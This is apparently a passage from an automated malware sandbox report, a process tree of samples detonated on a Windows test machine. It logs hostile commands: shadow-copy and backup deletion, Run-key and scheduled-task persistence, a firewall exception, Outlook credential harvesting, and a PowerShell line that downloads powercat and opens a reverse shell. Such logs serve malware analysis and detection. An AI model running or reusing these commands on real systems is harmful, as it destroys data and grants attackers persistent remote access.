                                                                                  "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                  5⤵
                                                                                  • Drops file in Windows directory
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  PID:8144
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /d /c taskkill /f /im E > NUL & ping -n 1 127.0.0.1 > NUL & del C > NUL && exit
                                                                                    6⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    PID:5132
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im E
                                                                                      7⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:7372
                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                      ping -n 1 127.0.0.1
                                                                                      7⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      • Runs ping.exe
                                                                                      PID:6640
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:840
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
                                                                                4⤵
                                                                                • Drops startup file
                                                                                • Executes dropped EXE
                                                                                • Sets desktop wallpaper using registry
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3916
                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                  attrib +h .
                                                                                  5⤵
                                                                                  • Views/modifies file attributes
                                                                                  PID:3104
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls . /grant Everyone:F /T /C /Q
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:4792
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                  taskdl.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:3660
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c 106341725244434.bat
                                                                                  5⤵
                                                                                    PID:748
                                                                                    • C:\Windows\SysWOW64\cscript.exe
                                                                                      cscript.exe //nologo m.vbs
                                                                                      6⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2968
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h +s F:\$RECYCLE
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Views/modifies file attributes
                                                                                    PID:864
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                    taskdl.exe
                                                                                    5⤵
                                                                                      PID:6256
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:7076
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /c start /b @[email protected] vs
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5724
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                        6⤵
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:7592
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7144
                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                            wmic shadowcopy delete
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:7548
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:7548
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                      5⤵
                                                                                      • Sets desktop wallpaper using registry
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3536
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rswjsaiu284" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3624
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "rswjsaiu284" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tasksche.exe\"" /f
                                                                                        6⤵
                                                                                        • Adds Run key to start application
                                                                                        • Modifies registry key
                                                                                        PID:5816
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                      taskdl.exe
                                                                                      5⤵
                                                                                        PID:8136
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                        5⤵
                                                                                          PID:2216
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5628
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                          taskdl.exe
                                                                                          5⤵
                                                                                            PID:1784
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe
                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]
                                                                                            5⤵
                                                                                              PID:6000
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
                                                                                              taskdl.exe
                                                                                              5⤵
                                                                                                PID:5068
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
                                                                                              "RIP_YOUR_PC_LOL.exe"
                                                                                              4⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4592
                                                                                              • C:\Users\Admin\Desktop\1.exe
                                                                                                "C:\Users\Admin\Desktop\1.exe"
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2912
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\D2E0.tmp\D2E1.tmp\D2E2.bat C:\Users\Admin\Desktop\1.exe"
                                                                                                  6⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4868
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s6
                                                                                                    7⤵
                                                                                                    • Enumerates system info in registry
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                    PID:1892
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0xf8,0x11c,0x128,0x7ffcc78e46f8,0x7ffcc78e4708,0x7ffcc78e4718
                                                                                                      8⤵
                                                                                                        PID:228
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
                                                                                                        8⤵
                                                                                                          PID:4700
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
                                                                                                          8⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:2824
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:2304
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                            8⤵
                                                                                                              PID:5280
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                                              8⤵
                                                                                                                PID:5288
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                                                                                                                8⤵
                                                                                                                  PID:3204
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
                                                                                                                  8⤵
                                                                                                                    PID:1436
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
                                                                                                                    8⤵
                                                                                                                      PID:1272
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
                                                                                                                      8⤵
                                                                                                                        PID:2436
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
                                                                                                                        8⤵
                                                                                                                          PID:7716
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 /prefetch:8
                                                                                                                          8⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Checks computer location settings
                                                                                                                          • Modifies registry class
                                                                                                                          PID:8056
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,6633014892094212199,7680756175739707155,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3116 /prefetch:2
                                                                                                                          8⤵
                                                                                                                            PID:6756
                                                                                                                    • C:\Users\Admin\Desktop\10.exe
                                                                                                                      "C:\Users\Admin\Desktop\10.exe"
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3608
                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                        attrib +h .
                                                                                                                        6⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:1704
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls . /grant Everyone:F /T /C /Q
                                                                                                                        6⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:2032
                                                                                                                    • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc" /o ""
                                                                                                                      5⤵
                                                                                                                        PID:5716
                                                                                                                      • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                        "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\3.xlsx"
                                                                                                                        5⤵
                                                                                                                          PID:5868
                                                                                                                        • C:\Users\Admin\Desktop\5.exe
                                                                                                                          "C:\Users\Admin\Desktop\5.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Modifies registry class
                                                                                                                          PID:2140
                                                                                                                          • C:\Windows\svchost.com
                                                                                                                            "C:\Windows\svchost.com" "C:\PROGRA~3\system.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:4904
                                                                                                                            • C:\PROGRA~3\system.exe
                                                                                                                              C:\PROGRA~3\system.exe
                                                                                                                              7⤵
                                                                                                                              • Drops startup file
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:6208
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh firewall add allowedprogram "C:\ProgramData\system.exe" "system.exe" ENABLE
                                                                                                                                8⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                PID:7100
                                                                                                                        • C:\Users\Admin\Desktop\6.exe
                                                                                                                          "C:\Users\Admin\Desktop\6.exe"
                                                                                                                          5⤵
                                                                                                                          • UAC bypass
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • System policy modification
                                                                                                                          PID:2272
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RjEPy8f68s.bat"
                                                                                                                            6⤵
                                                                                                                              PID:6372
                                                                                                                              • C:\Windows\system32\w32tm.exe
                                                                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                7⤵
                                                                                                                                  PID:5388
                                                                                                                                • C:\Documents and Settings\Idle.exe
                                                                                                                                  "C:\Documents and Settings\Idle.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:7160
                                                                                                                            • C:\Users\Admin\Desktop\7.exe
                                                                                                                              "C:\Users\Admin\Desktop\7.exe"
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:5568
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
                                                                                                                                6⤵
                                                                                                                                • Accesses Microsoft Outlook accounts
                                                                                                                                PID:6840
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
                                                                                                                                6⤵
                                                                                                                                  PID:2316
                                                                                                                              • C:\Users\Admin\Desktop\8.exe
                                                                                                                                "C:\Users\Admin\Desktop\8.exe"
                                                                                                                                5⤵
                                                                                                                                • Drops startup file
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                PID:5756
                                                                                                                                • C:\Windows\system32\wbem\wmic.exe
                                                                                                                                  "C:\ra\..\Windows\mcd\ttlug\..\..\system32\etenv\hlhr\ikw\..\..\..\wbem\rlw\knvf\kk\..\..\..\wmic.exe" shadowcopy delete
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5164
                                                                                                                              • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\9.docm" /o ""
                                                                                                                                5⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:5976
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  cmd /c powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                                                  6⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:6724
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.5.128/powercat.ps1');powercat -c 192.168.5.128 -p 1111 -e cmd
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:6340
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
                                                                                                                              "ska2pwej.aeh.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:4760
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-2SOD7.tmp\ska2pwej.aeh.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-2SOD7.tmp\ska2pwej.aeh.tmp" /SL5="$70272,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:1404
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
                                                                                                                              "x2s443bc.cs1.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:220
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-37KNF.tmp\x2s443bc.cs1.tmp
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-37KNF.tmp\x2s443bc.cs1.tmp" /SL5="$C025A,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:224
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                          2⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5792
                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                          C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
                                                                                                                          2⤵
                                                                                                                            PID:7800
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                            2⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:8084
                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                            C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
                                                                                                                            2⤵
                                                                                                                              PID:5648
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                              2⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:7344
                                                                                                                            • C:\Windows\System32\notepad.exe
                                                                                                                              C:\Windows\System32\notepad.exe
                                                                                                                              2⤵
                                                                                                                                PID:5984
                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4948
                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:5332
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Documents and Settings\Idle.exe'" /rl HIGHEST /f
                                                                                                                                  1⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:1396
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks.exe /create /tn "TEMPEX~1" /sc ONLOGON /tr "'C:\Documents and Settings\TEMPEX~1.exe'" /rl HIGHEST /f
                                                                                                                                  1⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:6032
                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:5616
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f
                                                                                                                                  1⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:3348
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks.exe /create /tn "svchost.com" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\bin\svchost.com.exe'" /rl HIGHEST /f
                                                                                                                                  1⤵
                                                                                                                                  • DcRat
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:3164
                                                                                                                                • C:\Windows\system32\schtasks.exe
